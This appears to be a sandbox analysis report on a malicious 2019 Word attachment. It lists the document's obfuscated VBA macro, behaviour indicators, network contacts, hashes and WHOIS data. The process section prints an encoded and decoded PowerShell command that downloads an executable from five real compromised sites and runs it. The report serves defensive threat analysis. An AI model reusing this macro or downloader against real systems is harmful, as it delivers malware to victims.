  File "dzpqM1P.bas" (Streampath: "Macros/VBA/dzpqM1P") has code: "Function uoNqtU()
  'Debug.Print "b0BZHL" + ("183" + ("zivHmYk") + "wBaqu6rY" + "71") + "QDTAM4X" + ("uYfwQN9") + ("dsi9pi" + "sPGtuHSm" + "337" + ("m6tAFE") + ("bpah8zU" + ("zXY1zb") + "33" + ("136") + ("IRNJ7TtI" + ("140"))))
  Debug.Print "X427sGbs" + ("164" + ("fHo9ja9") + "tsHpQTff" + "219") + "Jqffii5E" + ("VOCvqGj") + ("QKpJwvvM" + "f8f8ON8" + "611" + ("wj4IGci") + ("iN_ha6fh" + ("mtWNrto7") + "279" + ("804") + ("ZWi1zShD" + ("346"))))
  Set uoNqtU = CreateObject(("winmg" _
  + "mts:Win" + "32_Processstar" _
  + "tup"))
  'Debug.Print "qFY8Oc_" + ("359" + ("ar9j9siK") + "Lq9Mfh" + "157") + "TnI43hX" + ("vDH3XT") + ("SA_BqU" + "SIHLcsST" + "25" + ("TzFBkB") + ("hKWTon" + ("HqTsSu") + "52" + ("506") + ("ZoMvw2" + ("262"))))
  Debug.Print "RR0a_N" + ("77" + ("A1djHhJ") + "VBowknUi" + "797") + "SjCoaA4K" + ("YN0Yfj") + ("bqmKI2_j" + "SFcaB3Si" + "797" + ("Fo0YX8") + ("TEEimQX" + ("TMp2bL") + "819" + ("173") + ("JHGBw8" + ("794"))))
  With uoNqtU
  'Debug.Print "dQBjY7k" + ("974" + ("QT7rdU") + "X6mjd_F" + "991") + "H2TGwL" + ("N6iT0jt") + ("LmTb1DI" + "s_zCdYob" + "826" + ("Liv1GEwz") + ("C2ca3X0s" + ("JzGU2kNb") + "160" + ("674") + ("hRWq2dVw" + ("259"))))
  Debug.Print "mwJUml" + ("10" + ("aRiYbb0j") + "idYTLLD" + "190") + "Tih3qWj" + ("f2JAzO") + ("wPaiz65p" + "Z9JjZiJ" + "362" + ("jtE7RRPj") + ("iFzbF8G" + ("jnM_ABu") + "95" + ("47") + ("scPmDPKf" + ("206"))))
  . _
  ShowWindow = IOwYItd + GwVIiuD + JME1lI1 + rzmzA8P + MnlXk0St
  'Debug.Print "bRUtj3" + ("207" + ("InNhS_uK") + "zs3NLRvq" + "799") + "hbHqwZr" + ("ft8Ubc") + ("hTzPrjo" + "DIbzMZw" + "336" + ("E2flDt") + ("MwizuzO" + ("LM84iPI") + "334" + ("542") + ("VUL_7R" + ("379"))))
  Debug.Print "lujnOZ" + ("656" + ("VmkL7i") + "PllXQjt" + "816") + "ii3dcj3w" + ("QpElACIZ") + ("Uo3V9z" + "YNwwSfEk" + "429" + ("ATJEcQ") + ("AXNYUIs" + ("jjfpfFSQ") + "893" + ("516") + ("bbmLOq6" + ("239"))))
  End With
  'Debug.Print "RAUkdpoY" + ("209" + ("nliRGEhz") + "uhVGY4" + "460") + "E5laGK" + ("LYzCo85m") + ("YoGKjY" + "Y_iFwLB" + "916" + ("ILYGBNTb") + ("Nlbibp" + ("K6VNqprF") + "361" + ("135") + ("AtOGcw1" + ("361"))))
  Debug.Print "sIzoL4jA" + ("658" + ("Qtwd9f") + "z3KzAEi" + "362") + "izoGTD" + ("BdwhWif") + ("zaofQG8p" + "PzkohO0_" + "287" + ("VuQhdQ") + ("arUlXi7" + ("UsrcSX5") + "638" + ("451") + ("PXiN2f" + ("592"))))
  End Function"
  
  source
  
  Static Parser
  
  relevance
  
  10/10
- Creates a writable file in a temporary directory
  
  details
  
  "WINWORD.EXE" created file "%TEMP%\~DFA1166B5F0619415A.TMP"
  "WINWORD.EXE" created file "%TEMP%\Word8.0\MSForms.exd"
  
  source
  
  API Call
  
  relevance
  
  1/10
- Creates mutants
  
  details
  
  "\Sessions\1\BaseNamedObjects\Global\_MSIExecute"
  "Local\10MU_ACBPIDS_S-1-5-5-0-61600"
  "Global\MTX_MSO_AdHoc1_S-1-5-21-2092356043-4041700817-663127204-1001"
  "Global\MTX_MSO_Formal1_S-1-5-21-2092356043-4041700817-663127204-1001"
  "Global\552FFA80-3393-423d-8671-7BA046BB5906"
  "Local\ZonesLockedCacheCounterMutex"
  "Local\ZonesCacheCounterMutex"
  "Local\10MU_ACB10_S-1-5-5-0-61600"
  "\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-61600"
  "\Sessions\1\BaseNamedObjects\Local\10MU_ACB10_S-1-5-5-0-61600"
  "\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
  "\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
  "\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
  "\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-2092356043-4041700817-663127204-1001"
  "\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-2092356043-4041700817-663127204-1001"
  "\Sessions\1\BaseNamedObjects\Global\MsoShellExtRegAccess_S-1-5-21-2092356043-4041700817-663127204-1001"
  "\Sessions\1\BaseNamedObjects\RasPbFile"
  "\Sessions\1\BaseNamedObjects\Global\.net clr networking"
  
  source
  
  Created Mutant
  
  relevance
  
  3/10
- Drops files marked as clean
  
  details
  
  Antivirus vendors marked dropped file "~_TACHMENT654860I32560.doc" as clean (type is "data")
  
  source
  
  Extracted File
  
  relevance
  
  10/10
- Loads rich edit control libraries
  
  details
  
  "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 6B750000
  
  source
  
  Loaded Module
  
  ATT&CK ID
  
  T1179 (Show technique in the MITRE ATT&CK™ matrix)
- Loads the .NET runtime environment
  
  details
  
  "powershell.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll" at 5F6A0000
  
  source
  
  Loaded Module
- Process launched with changed environment
  
  details
  
  Process "powershell.exe" (Show Process) was launched with modified environment variables: "Path"
  Process "powershell.exe" (Show Process) was launched with missing environment variables: "MEOW, PROMPT, VXDIR"
  Process "936.exe" (Show Process) was launched with modified environment variables: "PSModulePath"
  Process "enablerouting.exe" (Show Process) was launched with modified environment variables: "Path, LOCALAPPDATA, USERDOMAIN, PSModulePath, TEMP, APPDATA, USERPROFILE, TMP"
  Process "enablerouting.exe" (Show Process) was launched with missing environment variables: "LOGONSERVER, HOMEPATH, HOMEDRIVE"
  
  source
  
  Monitored Target
  
  relevance
  
  10/10
- Removes Office resiliency keys (often used to avoid problems opening documents)
  
  details
  
  "WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "JLF")
  "WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "PPF")
  "WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "HIF")
  "WINWORD.EXE" (Access type: "DELETE"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS")
  
  source
  
  Registry Access
  
  relevance
  
  10/10
  
  ATT&CK ID
  
  T1112 (Show technique in the MITRE ATT&CK™ matrix)
- Scanning for window names
  
  details
  
  "WINWORD.EXE" searching for class "mspim_wnd32"
  "WINWORD.EXE" searching for class "Shell_TrayWnd"
  "WINWORD.EXE" searching for class "MSOBALLOON"
  "WINWORD.EXE" searching for class "MsoHelp10"
  "WINWORD.EXE" searching for class "AgentAnim"
  
  source
  
  API Call
  
  relevance
  
  10/10
  
  ATT&CK ID
  
  T1010 (Show technique in the MITRE ATT&CK™ matrix)
- Spawns new processes
  
  details
  
  Spawned process "powershell.exe" with commandline "powershell -nop -e JABDAGwASQBFAFkAawAyAD0AJwBhAEoATgBNAEsARgAzA ..." (UID: 00023640-00002624, Additional Context: "$ClIEYk2='aJNMKF3l';$RwYKCvO = '936';$QBVad9='L8HDzN';$wXpbVp=$env:userprofile+'\'+$RwYKCvO+'.exe';$GAizz7='DOIoST';$Tb9Eu2Ir=.('new-'+'obj'+'ect') Net`.WeBC`L`IENt;$kuW_o7S5='http://ceo.calcus.com/postnewo/RwhvOlZIs/@http://lastminutelollipop.com/wp-admin/aEQlppdlfo/@http://kashmirhackers.com/wp-admin/wQXhortSfJ/@http://omegaconsultoriacontabil.com.br/site/wAKkbOEwy/@http://nottspcrepair.co.uk/nye/hKZlDvPfy/'.SPLiT('@');$o7VBQtlb='O1YGb0p';foreach($z3Rv3jv in $kuW_o7S5){try{$Tb9Eu2Ir.DowNLOadFILE($z3Rv3jv, $wXpbVp);$iYpOYcLV='X06jSR24';If ((&('Get-'+'Ite'+'m') $wXpbVp).lEngTH -ge 29780) {[Diagnostics.Process]::START($wXpbVp);$VHTOouw='I_Wk2bHr';break;$EXXmBmX='rkFKCT'}}catch{}}$SAutaY='YnVq3JJ'"), Spawned process "936.exe" (Show Process), Spawned process "936.exe" with commandline "--26d066e0" (Show Process), Spawned process "enablerouting.exe" (Show Process)
  
  source
  
  Monitored Target
  
  relevance
  
  3/10
Installation/Persistance
- Dropped files
  
  details
  
  "~_TACHMENT654860I32560.doc" has type "data"
  "936.exe" has type "PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows"
  "ATTACHMENT654860I32560.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Wed May 29 15:23:51 2019 mtime=Wed May 29 15:23:51 2019 atime=Wed May 29 15:23:59 2019 length=139648 window=hide"
  "overlay_b8c27b52260960969b7cc26bda03b231d3e39ca2d71dde8953ea41d49b6aca6b" has type "data"
  "84C64B4B.wmf" has type "ms-windows metafont .wmf"
  "J911RP8EVIZ54JIDQNDE.temp" has type "data"
  "index.dat" has type "data"
  "8E4EB146.wmf" has type "ms-windows metafont .wmf"
  "6501AC75.wmf" has type "ms-windows metafont .wmf"
  "~WRS_A5A5BC33-DAAF-4883-8354-CBC8AFF9588C_.tmp" has type "data"
  "A3395FF2.wmf" has type "ms-windows metafont .wmf"
  "E476E48F.wmf" has type "ms-windows metafont .wmf"
  "4B119544.wmf" has type "ms-windows metafont .wmf"
  "MSForms.exd" has type "data"
  "~_Normal.dotm" has type "data"
  
  source
  
  Extracted File
  
  relevance
  
  3/10
- Drops executable files
  
  details
  
  "936.exe" has type "PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows"
  
  source
  
  Extracted File
  
  relevance
  
  10/10
- Found a string that may be used as part of an injection method
  
  details
  
  "Shell_TrayWnd" (Taskbar window class may be used to inject into explorer with the SetWindowLong method)
  
  source
  
  String
  
  relevance
  
  4/10
  
  ATT&CK ID
  
  T1055 (Show technique in the MITRE ATT&CK™ matrix)
- Opens the MountPointManager (often used to detect additional infection locations)
  
  details
  
  "WINWORD.EXE" opened "\Device\MountPointManager"
  "powershell.exe" opened "\Device\MountPointManager"
  
  source
  
  API Call
  
  relevance
  
  5/10
- Touches files in the Windows directory
  
  details
  
  "WINWORD.EXE" touched file "C:\Windows\AppPatch\sysmain.sdb"
  "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
  "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
  "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
  "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
  "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
  "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
  "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
  "WINWORD.EXE" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
  "WINWORD.EXE" touched file "C:\Windows\Fonts\StaticCache.dat"
  "WINWORD.EXE" touched file "C:\Windows\System32\en-US\user32.dll.mui"
  "WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
  "WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\cversions.1.db"
  "WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001d.db"
  "WINWORD.EXE" touched file "C:\Windows\System32\rsaenh.dll"
  "WINWORD.EXE" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
  "WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll"
  
  source
  
  API Call
  
  relevance
  
  7/10
Network Related
- Found potential URL in binary/memory
  
  details
  
  Pattern match: "http://ceo.calcus.com/postnewo/RwhvOlZIs/@http://lastminutelollipop.com/wp-admin/aEQlppdlfo/@http://kashmirhackers.com/wp-admin/wQXhortSfJ/@http://omegaconsultoriacontabil.com.br/site/wAKkbOEwy/@http://nottspcrepair.co.uk/nye/hKZlDvPfy/'.SPLiT('@');$o7VBQt"
  Heuristic match: "lastminutelollipop.com"
  Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main"
  Heuristic match: "ceo.calcus.com"
  
  source
  
  String
  
  relevance
  
  10/10
System Security
- Hooks API calls
  
  details
  
  "SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
  "OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
  "VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
  "VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
  "SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
  
  source
  
  Hook Detection
  
  relevance
  
  10/10
  
  ATT&CK ID
  
  T1179 (Show technique in the MITRE ATT&CK™ matrix)
- Modifies proxy settings
  
  details
  
  "powershell.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  "powershell.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  
  source
  
  Registry Access
  
  relevance
  
  10/10
  
  ATT&CK ID
  
  T1112 (Show technique in the MITRE ATT&CK™ matrix)
Unusual Characteristics
- Installs hooks/patches the running process
  
  details
  
  "WINWORD.EXE" wrote bytes "663c2abf" to virtual address "0x6BF2CA70" (part of module "GFX.DLL")
  "WINWORD.EXE" wrote bytes "5f886bb8" to virtual address "0x6DAE10AC" (part of module "MSPTLS.DLL")
  "WINWORD.EXE" wrote bytes "e9d7326eed" to virtual address "0x77B947BA" ("SysAllocStringByteLen@OLEAUT32.DLL")
  "WINWORD.EXE" wrote bytes "dbfc2fbf" to virtual address "0x6DF4F530" (part of module "WWLIB.DLL")
  "WINWORD.EXE" wrote bytes "bd7dfdbf" to virtual address "0x2F511B94" (part of module "WINWORD.EXE")
  "WINWORD.EXE" wrote bytes "e9fef3ffee" to virtual address "0x7681A00A" ("OleLoadFromStream@OLE32.DLL")
  "WINWORD.EXE" wrote bytes "e9848eceee" to virtual address "0x7654F71B" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
  "WINWORD.EXE" wrote bytes "b8c0157572ffe0" to virtual address "0x757711F8" (part of module "SSPICLI.DLL")
  "WINWORD.EXE" wrote bytes "d5d9547630c65476e0c2547642c6547610c65476acdc5476a0df547636da547687f154760000000091778c77c0908c777f6f8c771ffa8c77def48c77f2828c77857d8c7700000000" to virtual address "0x73101000" (part of module "MSIMG32.DLL")
  "WINWORD.EXE" wrote bytes "f8117775" to virtual address "0x75788368" (part of module "SSPICLI.DLL")
  "WINWORD.EXE" wrote bytes "68130000" to virtual address "0x75D51680" (part of module "WS2_32.DLL")
  "WINWORD.EXE" wrote bytes "f8117775" to virtual address "0x757883E0" (part of module "SSPICLI.DLL")
  "WINWORD.EXE" wrote bytes "e9c4546eed" to virtual address "0x77B93F20" ("VariantClear@OLEAUT32.DLL")
  "WINWORD.EXE" wrote bytes "60127572" to virtual address "0x75FFE324" (part of module "WININET.DLL")
  "WINWORD.EXE" wrote bytes "48127775" to virtual address "0x75788364" (part of module "SSPICLI.DLL")
  "WINWORD.EXE" wrote bytes "e9ab9970ed" to virtual address "0x77B95D66" ("VariantChangeType@OLEAUT32.DLL")
  "WINWORD.EXE" wrote bytes "0f224dbf" to virtual address "0x65490BA8" (part of module "MSO.DLL")
  "WINWORD.EXE" wrote bytes "48127775" to virtual address "0x757883DC" (part of module "SSPICLI.DLL")
  "WINWORD.EXE" wrote bytes "48120000" to virtual address "0x7577139C" (part of module "SSPICLI.DLL")
  "WINWORD.EXE" wrote bytes "48120000" to virtual address "0x757712DC" (part of module "SSPICLI.DLL")
  
  source
  
  Hook Detection
  
  relevance
  
  10/10
  
  ATT&CK ID
  
  T1179 (Show technique in the MITRE ATT&CK™ matrix)

File Details

All Details:

ATTACHMENT 654860 I32560.doc

Filename: ATTACHMENT 654860 I32560.doc
Size: 136KiB (139648 bytes)
Type: doc office
Description: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: North Dakota, Subject: Maine, Author: Darrell Hammes, Comments: Tunisia policy, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed May 29 12:55:00 2019, Last Saved Time/Date: Wed May 29 12:55:00 2019, Number of Pages: 1, Number of Words: 15, Number of Characters: 90, Security: 0
Architecture
: WINDOWS
SHA256
: 8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5
MD5
: 49fbc31d5e46d83c4741d64a1c268e8d
SHA1
: 62b00133e2a78063b76a473a9c0b42a00b3042b8
ssdeep
: 3072:t1b77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qSp8ALPmiuVvbIF/j9G5:Pb77HUUUUUUUUUUUUUUUUUUUT52VP61Z

Resources

Icon

Visualization

Input File (PortEx)

Classification (TrID)

54.2% (.DOC) Microsoft Word document
32.2% (.DOC) Microsoft Word document (old ver.)
13.5% (.) Generic OLE2 / Multistream Compound File

Screenshots

Loading content, please wait...

Hybrid Analysis

Tip: Click an analysed process below to view more details.

Analysed 5 processes in total.

WINWORD.EXE /n "C:\ATTACHMENT654860I32560.doc" (PID: 3256)
powershell.exe powershell -nop -e JABDAGwASQBFAFkAawAyAD0AJwBhAEoATgBNAEsARgAzAGwAJwA7ACQAUgB3AFkASwBDAHYATwAgAD0AIAAnADkAMwA2ACcAOwAkAFEAQgBWAGEAZAA5AD0AJwBMADgASABEAHoATgAnADsAJAB3AFgAcABiAFYAcAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUgB3AFkASwBDAHYATwArACcALgBlAHgAZQAnADsAJABHAEEAaQB6AHoANwA9ACcARABPAEkAbwBTAFQAJwA7ACQAVABiADkARQB1ADIASQByAD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAGUAdABgAC4AVwBlAEIAQwBgAEwAYABJAEUATgB0ADsAJABrAHUAVwBfAG8ANwBTADUAPQAnAGgAdAB0AHAAOgAvAC8AYwBlAG8ALgBjAGEAbABjAHUAcwAuAGMAbwBtAC8AcABvAHMAdABuAGUAdwBvAC8AUgB3AGgAdgBPAGwAWgBJAHMALwBAAGgAdAB0AHAAOgAvAC8AbABhAHMAdABtAGkAbgB1AHQAZQBsAG8AbABsAGkAcABvAHAALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGEARQBRAGwAcABwAGQAbABmAG8ALwBAAGgAdAB0AHAAOgAvAC8AawBhAHMAaABtAGkAcgBoAGEAYwBrAGUAcgBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB3AFEAWABoAG8AcgB0AFMAZgBKAC8AQABoAHQAdABwADoALwAvAG8AbQBlAGcAYQBjAG8AbgBzAHUAbAB0AG8AcgBpAGEAYwBvAG4AdABhAGIAaQBsAC4AYwBvAG0ALgBiAHIALwBzAGkAdABlAC8AdwBBAEsAawBiAE8ARQB3AHkALwBAAGgAdAB0AHAAOgAvAC8AbgBvAHQAdABzAHAAYwByAGUAcABhAGkAcgAuAGMAbwAuAHUAawAvAG4AeQBlAC8AaABLAFoAbABEAHYAUABmAHkALwAnAC4AUwBQAEwAaQBUACgAJwBAACcAKQA7ACQAbwA3AFYAQgBRAHQAbABiAD0AJwBPADEAWQBHAGIAMABwACcAOwBmAG8AcgBlAGEAYwBoACgAJAB6ADMAUgB2ADMAagB2ACAAaQBuACAAJABrAHUAVwBfAG8ANwBTADUAKQB7AHQAcgB5AHsAJABUAGIAOQBFAHUAMgBJAHIALgBEAG8AdwBOAEwATwBhAGQARgBJAEwARQAoACQAegAzAFIAdgAzAGoAdgAsACAAJAB3AFgAcABiAFYAcAApADsAJABpAFkAcABPAFkAYwBMAFYAPQAnAFgAMAA2AGoAUwBSADIANAAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQB0AGUAJwArACcAbQAnACkAIAAkAHcAWABwAGIAVgBwACkALgBsAEUAbgBnAFQASAAgAC0AZwBlACAAMgA5ADcAOAAwACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAFQAQQBSAFQAKAAkAHcAWABwAGIAVgBwACkAOwAkAFYASABUAE8AbwB1AHcAPQAnAEkAXwBXAGsAMgBiAEgAcgAnADsAYgByAGUAYQBrADsAJABFAFgAWABtAEIAbQBYAD0AJwByAGsARgBLAEMAVAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABTAEEAdQB0AGEAWQA9ACcAWQBuAFYAcQAzAEoASgAnAA== (PID: 2624, Additional Context: $ClIEYk2='aJNMKF3l';$RwYKCvO = '936';$QBVad9='L8HDzN';$wXpbVp=$env:userprofile+'\'+$RwYKCvO+'.exe';$GAizz7='DOIoST';$Tb9Eu2Ir=.('new-'+'obj'+'ect') Net`.WeBC`L`IENt;$kuW_o7S5='http://ceo.calcus.com/postnewo/RwhvOlZIs/@http://lastminutelollipop.com/wp-admin/aEQlppdlfo/@http://kashmirhackers.com/wp-admin/wQXhortSfJ/@http://omegaconsultoriacontabil.com.br/site/wAKkbOEwy/@http://nottspcrepair.co.uk/nye/hKZlDvPfy/'.SPLiT('@');$o7VBQtlb='O1YGb0p';foreach($z3Rv3jv in $kuW_o7S5){try{$Tb9Eu2Ir.DowNLOadFILE($z3Rv3jv, $wXpbVp);$iYpOYcLV='X06jSR24';If ((&('Get-'+'Ite'+'m') $wXpbVp).lEngTH -ge 29780) {[Diagnostics.Process]::START($wXpbVp);$VHTOouw='I_Wk2bHr';break;$EXXmBmX='rkFKCT'}}catch{}}$SAutaY='YnVq3JJ')
- 936.exe (PID: 2888) 24/72 Hash Seen Before
  - 936.exe --26d066e0 (PID: 2932) 24/72 Hash Seen Before
enablerouting.exe (PID: 272) 24/72

Logged Script Calls	Logged Stdout	Extracted Streams	Memory Dumps
Reduced Monitoring	Network Activityy	Network Error	Multiscan Match

Network Analysis

DNS Requests

Domain

Address

Registrar

Country

ceo.calcus.com
OSINT

Associated Artifacts for ceo.calcus.com

Whois Field	Value
Address	Köydenpunojankatu 2 AD
City	Helsinki
Country	FI
Creation Date	Fri, 31 Oct 2003 00:00:00 GMT
Creation Date	Fri, 31 Oct 2003 19:35:20 GMT
DNSSEC	unSigned
Domain Name	CALCUS.COM
EMail	olli.maila@calcus.com
EMail	abuse@name.com
Expiration Date	Tue, 31 Oct 2017 00:00:00 GMT
Expiration Date	Tue, 31 Oct 2017 18:35:20 GMT
name	Olli Maila
Name Server	NS2NSW.NAME.COM
Referral URL	http://www.name.com
Reigstrar	Name.com, Inc.
State	Uusimaa
Status	clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Status	clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Last Update	Wed, 24 May 2017 00:00:00 GMT
Last Update	Wed, 24 May 2017 07:41:00 GMT
Whois Server	whois.name.com
Zip Code	00180

68.183.65.234
TTL: 299

Name.com, Inc.

United States

lastminutelollipop.com
OSINT

Associated Artifacts for lastminutelollipop.com

Whois Field	Value
Address	Ocean Centre, Montagu Foreshore, East Bay Street
City	Nassau
Country	BS
Creation Date	Sat, 22 Jun 2013 11:50:47 GMT
DNSSEC	unsigned
Domain Name	LASTMINUTELOLLIPOP.COM
EMail	abuse@internet.bs
EMail	543403756xlzca3u@5225b4d0pi3627q9.whoisprivacycorp.com
Expiration Date	Sat, 22 Jun 2019 11:50:47 GMT
name	Not disclosed Not disclosed
Name Server	NS02.WEBFUNDAMENT.COM
Organization	Whois Privacy Corp.
Reigstrar	Internet Domain Service BS Corp.
State	New Providence
Status	clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Status	clientTransferProhibited - http://www.icann.org/epp#clientTransferProhibited
Last Update	Thu, 21 Jun 2018 04:40:08 GMT
Last Update	Wed, 21 Jun 2017 04:44:40 GMT
Whois Server	whois.internet.bs

158.69.127.22
TTL: 9386

Internet Domain Service BS Corp.

Canada

Contacted Hosts

IP Address

Port/Protocol

Associated Process

Details

68.183.65.234

Associated Artifacts for 68.183.65.234

Details	Associated URL	Threat Level	Positives	Scan Date	Reference
Associated URL http://ceo.calcus.com/ Threat Level suspicious Positives 1/66 Scan Date 05/29/2019 15:00:22 Reference -	http://ceo.calcus.com/	suspicious	1/66	05/29/2019 15:00:22	-
Associated URL http://ceo.calcus.com/postnewo/rwhvolzis Threat Level malicious Positives 2/66 Scan Date 05/29/2019 14:41:25 Reference -	http://ceo.calcus.com/postnewo/rwhvolzis	malicious	2/66	05/29/2019 14:41:25	-
Associated URL http://ceo.calcus.com/postnewo/RwhvOlZIs Threat Level malicious Positives 4/71 Scan Date 05/29/2019 13:50:16 Reference -	http://ceo.calcus.com/postnewo/RwhvOlZIs	malicious	4/71	05/29/2019 13:50:16	-
Associated URL http://ceo.calcus.com/postnewo/RwhvOlZIs/ Threat Level malicious Positives 3/66 Scan Date 05/29/2019 13:53:47 Reference -	http://ceo.calcus.com/postnewo/RwhvOlZIs/	malicious	3/66	05/29/2019 13:53:47	-

Details	Associated SHA256	Threat Level	Positives	Scan Date	Reference
Associated SHA256 7221a5ac575f1c4812be871a2ba7cfaf793d95e510e330da59fe5329dda3fcb6 Threat Level malicious Positives 24/73 Scan Date 05/29/2019 13:43:20 Reference VirusTotal	7221a5ac575f1c4812be871a2ba7cfaf793d95e510e330da59fe5329dda3fcb6	malicious	24/73	05/29/2019 13:43:20	VirusTotal
Associated SHA256 88edc52a1ab13b3d74205b0ba6db9cc9e27050d9d4cf0e1e266ac3b252dc8648 Threat Level malicious Positives 15/72 Scan Date 05/29/2019 13:58:25 Reference VirusTotal	88edc52a1ab13b3d74205b0ba6db9cc9e27050d9d4cf0e1e266ac3b252dc8648	malicious	15/72	05/29/2019 13:58:25	VirusTotal

Details	Domain	Threat Level	Positives	Last Resolved	Reference
Domain ceo.calcus.com Threat Level - Positives - Last Resolved 05/29/2019 13:22:37 VirusTotal Report	ceo.calcus.com	-	-	05/29/2019 13:22:37	Report

TCP

powershell.exe
PID: 2624

United States

158.69.127.22

Associated Artifacts for 158.69.127.22

Details	Associated URL	Threat Level	Positives	Scan Date	Reference
Associated URL http://lastminutelollipop.com/wp-admin/inc/s48v4ay1b83tko_a2sdiq6-250133534/ Threat Level malicious Positives 10/67 Scan Date 05/29/2019 15:20:40 Reference -	http://lastminutelollipop.com/wp-admin/inc/s48v4ay1b83tko_a2sdiq6-250133534/	malicious	10/67	05/29/2019 15:20:40	-
Associated URL http://lastminutelollipop.com/ Threat Level malicious Positives 7/67 Scan Date 05/29/2019 15:20:00 Reference -	http://lastminutelollipop.com/	malicious	7/67	05/29/2019 15:20:00	-
Associated URL http://lastminutelollipop.com/wp-admin/aeqlppdlfo/ Threat Level malicious Positives 10/70 Scan Date 05/29/2019 15:14:36 Reference -	http://lastminutelollipop.com/wp-admin/aeqlppdlfo/	malicious	10/70	05/29/2019 15:14:36	-
Associated URL http://lastminutelollipop.com/wp-admin/aEQlppdlfo Threat Level malicious Positives 9/71 Scan Date 05/29/2019 14:50:22 Reference -	http://lastminutelollipop.com/wp-admin/aEQlppdlfo	malicious	9/71	05/29/2019 14:50:22	-
Associated URL http://lastminutelollipop.com/wp-admin/aEQlppdlfo/ Threat Level malicious Positives 8/67 Scan Date 05/29/2019 14:39:11 Reference -	http://lastminutelollipop.com/wp-admin/aEQlppdlfo/	malicious	8/67	05/29/2019 14:39:11	-

Details	Associated SHA256	Threat Level	Positives	Scan Date	Reference
Associated SHA256 7221a5ac575f1c4812be871a2ba7cfaf793d95e510e330da59fe5329dda3fcb6 Threat Level malicious Positives 24/73 Scan Date 05/29/2019 13:43:20 Reference VirusTotal	7221a5ac575f1c4812be871a2ba7cfaf793d95e510e330da59fe5329dda3fcb6	malicious	24/73	05/29/2019 13:43:20	VirusTotal
Associated SHA256 88edc52a1ab13b3d74205b0ba6db9cc9e27050d9d4cf0e1e266ac3b252dc8648 Threat Level malicious Positives 15/72 Scan Date 05/29/2019 13:58:25 Reference VirusTotal	88edc52a1ab13b3d74205b0ba6db9cc9e27050d9d4cf0e1e266ac3b252dc8648	malicious	15/72	05/29/2019 13:58:25	VirusTotal
